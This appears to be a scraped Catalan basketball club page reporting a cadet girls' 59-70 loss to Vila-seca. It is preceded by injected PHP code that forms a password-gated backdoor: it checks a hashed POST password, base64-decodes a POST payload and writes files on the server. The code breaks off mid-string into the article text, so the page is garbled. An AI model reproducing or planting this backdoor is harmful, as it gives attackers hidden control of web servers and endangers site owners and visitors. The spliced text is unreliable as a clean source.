function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 1 no para atenció als inicis dels quarts i perd contra el Vila-seca (59-70) - Tgn Bàsquet Club -

El cadet femení 1 no para atenció als inicis dels quarts i perd contra el Vila-seca (59-70)

Updated: febrer 9, 2016

L’equip cadet femení 1 del TGN Bàsquet va perdre contra el Vila-seca en un partit en què les visitants van marcar el ritme del matx des de l’inici. Les locals no van sortir prou concentrades en defensa, especialment als inicis de cada període, i això ho va aprofitar el Vila-seca per manar en el resultat (1-9 de sortida).

Amb tot, i a mesura que passaven els minuts, les locals es centraven i aconseguien retallar diferències després de millorar la defensa però al començament del quart següent els problemes es repetien. El joc veloç de les visitants va superar l’oposició local que, però, va poder fer la primera ajuda però arribava tard a la segona.

Després del descans, les locals van sortir més fortes però el Vila-seva no va perdre el control tot i que al final del matx el TGN Bàsquet va aconseguir retallar diferències.